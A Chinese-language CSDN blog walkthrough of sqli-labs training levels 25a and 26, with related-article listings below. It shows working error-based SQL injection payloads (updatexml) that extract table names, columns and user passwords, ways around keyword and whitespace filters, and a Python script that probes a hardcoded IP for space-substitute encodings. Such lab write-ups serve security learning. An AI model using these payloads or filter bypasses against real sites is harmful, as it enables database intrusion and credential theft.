sqlilabs(25a-26)

最新推荐文章于 2024-05-06 18:59:53 发布
最新推荐文章于 2024-05-06 18:59:53 发布
阅读量889 收藏
点赞数
分类专栏: 笔记 文章标签: 网络安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cuddlylm/article/details/124333641
版权

less-25a

过滤了or和and
变量$id的包裹方式从单引号变成了没有引号包裹,其余和25关一样

less-26

第26关会出现在apach下空格无法转义的问题,所以这里我们用docker做题
先起docker

docker images
docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs
ifconfig

起完docker,先重置数据库再做题
阅读源码发现过滤了很多东西,而且是用正则过滤的
在这里插入图片描述or and / – # 空格 和所有的斜杠和反斜杠

常用的注释符被注释掉了
这里可以尝试用 ;%00 (00截断) 的方式绕过
也可以用%23
或者也可以用 or ‘1’='1 的方式闭合(但是要注意这题的or也被过滤掉了)
or要用 || 绕过,或者用双写绕过
空格也被过滤了,用
/**/
()
回车(url编码中的%0a)
`(tab键上面的按钮)
tap
两个空格(双写绕过)

如果用报错注入的话就不用考虑空格的问题
payload如下:

?id=1' || updatexml(1,concat(0x7e,(database()),0x7e),1) || '1'='1
?id=1' || updatexml(1,concat(0x7e,(database()),0x7e),1) ;%00

在这里插入图片描述
成功绕过
接下来查security库下面的表:

?id=1' || updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables) where (table_schema=0x7365637572697479)),0x7e),1) || '1'='1

XPATH syntax error: ‘emails,referers,uagents,users
发现虽然用了group_concat函数但是还是会出现显示不完全的问题,建议是用limit一个一个的查

?id=1' || updatexml(1,concat(0x7e,(database())),1) || '1'='1
?id=1' || updatexml(1,concat(0x7e,(select(group_concat(table_name)) from (infoorrmation_schema.tables) where (table_schema = 0x7365637572697479))),1) ||'1'='1  
/?id=1' || updatexml(1,concat(0x7e,(select(group_concat(column_name)) from (infoorrmation_schema.columns) where (table_name = 0x7573657273))),1) || '1'='1
/?id=1' || updatexml(1,concat(0x7e,(select(group_concat(concat_ws(0x7e,username,passwoorrd))) from (security.users))),1) || '1'='1
/?id=1' || updatexml(1,concat(0x7e,(select(group_concat(concat_ws(0x7e,username,passwoorrd))) from (security.users) where (id=2))),1) || '1'='1    
 #通过改变id的值可以遍历所有的数据

当我们使用%a0充当空格替换的时候:

?id=1' %a0%a0%a0%a0 oorrder %a0by%a0;%00        #其中%a0表示空格

下面这个脚本为判断有哪些符合要求的替换空格的编码

参考:HTML URL
编码参考手册:https://www.w3school.com.cn/tags/html_ref_urlencode.html

脚本如下

# -*- encoding: utf-8 -*-
import requests

for i in range(0, 256):
    # print(i)
    code = hex(i).replace('0x', '')
    if len(code) < 2:
        code = "0" + code
    code_0x = "%" + code
    # print(code_0x)
    url = "http://121.199.30.46/Less-26/?id=1'" + code_0x + "%26%26" + code_0x  + "'1'='1"
    r = requests.get(url=url)
    if "Dumb" in r.content.decode("utf-8", "ignore"):
        print(code_0x)
cyphersec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs Less-2626a、27、27a、28、28a(sqli-labs闯关指南 2626a、27、27a、28、28a)—Advanced injection
m0_54899775的博客
12-25 1294
sqli-labs Less-2626a、27、27a、28、28a(sqli-labs闯关指南 2626a、27、27a、28、28a)—Advanced injection
SQLMAP脚本-sql-labs-Less-26-27a
m0_69844818的博客
09-19 1694
sqlmap脚本跑sqli-labs
【史上最全sqlmap通关sqli-labs靶场教程】
DMXA的博客
10-15 3118
【史上最全sqlmap通关sqli-labs靶场教程】
2024年网络安全-sqlmap实战之sqlilabs-Less5_sqlmap打less5,网络安全基础学习教程
2401_84253089的博客
05-06 841
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
sqli-labs关卡25(基于get提交的过滤and和or的联合注入)
zyh1588的博客
01-16 1239
小白回顾sqli-labs靶场25关
(手工)【sqli-labs2626a】拼接注入、过滤后注入
07-12 687
SQL-拼接、过滤后注入】
sqli-labs第26~28关
yuqnqi的博客
05-13 407
查看源码黑名单,过滤了 or,and , /* , – , # , 空格 , /\s 代表中的一个空白字符(可能是空格、、其他空白) 即 \s 用于匹配空白字符。我们常见的绕过空格的就是多行注释,/**/但这里过滤了,不太行啊将空格,or,and,/*,#,--,/等各种符号过滤,此处对于and,or的处理方法不再赘述,参考25.此处我们需要说明两方面:对于注释和结尾字符的我们此处只能利用构造一个 ' 来闭合后面到 ';对于空格,有较多的方法:%09 TAB键(水平)%0a 新建一行。
056C-4678B01-01 ROTARY ENCODER (WITHOUT DETENT) RE160F-40E3-25A-24P-N_130709规格书
09-20
056C-4678B01-01是一款无阻尼旋转编码器,型号为RE160F-40E3-25A-24P-N,其规格书详细介绍了该产品的各项技术参数和特性,是开发过程中不可或缺的重要参考资料。旋转编码器是一种用于检测角度位置、速度和角加速度的...
【施耐德 Schneider 产品参数表】M9R81225 Multi9 - GFP - RCCB - 2P - 25A - c
09-02
2. **剩余电流灵敏度**:按照UL 1053标准,瞬时动作电流为26mA,而根据EN/IEC 61008-1标准,瞬时动作电流为30mA,确保快速响应过电流情况。 3. **保护等级**:产品被归类为Type A-SI(Super Immunised),意味着它...
建伍KENWOOD TH-25A TH-45A对讲机 维修手册 维修图纸电路图
02-08
《建伍KENWOOD TH-25A TH-45A对讲机维修手册与电路图详解》 在无线通信领域,对讲机是不可或缺的工具,尤其在户外活动、应急救援以及商业通信中广泛使用。建伍(KENWOOD)作为全球知名的无线电通信设备制造商,其...
FAA-H-8083-25A.pdf
08-23
FAA发行的8083飞行载重手册,详细介绍了飞机的载重与平衡准则。
2788727d-25a0-41b2-b6b4-265d193edb95.doc
最新发布
06-01
2788727d-25a0-41b2-b6b4-265d193edb95.doc
SQLi LABS Less 25 联合注入+报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-28 1万+
SQLi 第二十五关,SQLi-LABS Less-25,SQLi-LABS Less 25,SQLiLABS Less25,SQLi Less 25
sql_labs通关,手动加sqlmap
qq_47289634的博客
02-23 739
信息收集: 数据库版本:version()数据库名字:database() 数据库用户:user() 系统:@@version_compile_os MySQL5.0以上版本自带一个information_schema数据库,储存所有的数据库名表名列名 数据库中 . (点)代表下一级 student.users 代表student数据库中的users表看我另外一篇,点击下方蓝色字体sqlmap详细使用方法id=1,id=2返回类内容不同,输入的内容是带入到数据库里面查询了。 判断类型:这里我把源代码输出了
Sqli-labs——lesson25(联合查询和报错注入,附各种sql万能密码)
weixin_62281892的博客
07-12 894
25
基于Sqli-Labs靶场的SQL注入-25~28关
Joker
01-07 1441
这一篇博客我主要讲了各种语句被注释后的绕过方法,包括 and 和 or 的绕过、空格和注释符的绕过、union 和 select 的绕过。
sqli-labs靶场实战25-30题
qq_42261604的博客
02-28 3963
Less-25 过滤or和and,过滤方式是将其替换为空,使用双重字符可绕过,如oorr,anandd。 单引号注入判断 http://127.0.0.1/sql/Less-25/?id=1' anandd 1=2 -- - 异常 http://127.0.0.1/sql/Less-25/?id=1' anandd 1=1 -- - 登录成功 报错注入 http://127.0.0.1/sql/Less-25/?id=1' anandd update...
sqlilabs靶场记录中级关(五)
wanan的博客
10-08 491
sqlilabs靶场记录中级关(五)
在CentOS7中搭建sqli-labs环境以及使用sqlmap对其进行sql注入
m0_53499553的博客
04-04 6837
目录 安装docker 使用docker拉取sqli-labs的镜像 对我们使用到的sqlmap的参数解释 使用Kali中自带的sqlmap进行sql注入 安装docker 因为我们是使用docker去搭建sqli-labs,所以在CentOS7中搭建sqli-labs环境之前需要先安装docker(如果安装过,可以直接去执行安装完docker的后续步骤) 安装需要的软件包,yum-util 提供yum-config-manager实用程序,另外两个是devicemapper驱动依赖的,需要.
泰科智能25A8X-TM伺服放大器技术手册详解
泰科智能25A8X-TM伺服放大器技术参考手册是一份详尽的技术文档,由深圳市泰科智能伺服技术有限公司发布,专为用户理解和操作这款高性能的伺服驱动器设计。该手册主要针对泰科智能的25A8X系列伺服驱动器,提供了全面...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值